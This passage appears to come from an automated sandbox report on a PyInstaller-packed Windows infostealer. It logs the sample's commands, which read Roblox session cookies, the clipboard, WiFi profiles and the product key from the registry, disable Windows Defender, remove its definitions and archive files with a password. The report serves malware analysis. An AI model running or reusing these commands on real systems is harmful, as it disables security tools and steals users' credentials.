               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
               Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
               Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
               Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
               Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe Code function: 65_2_00007FF629B3B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,65_2_00007FF629B3B340
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Code function: 0_2_00007FF6FB208880 cpuid 0_2_00007FF6FB208880
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformation
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformation
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libcrypto-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libffi-7.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\libssl-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73802\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeQueries volume information: C:\Users\user\Desktop\e45AiBoV6X.exe VolumeInformationJump to behavior
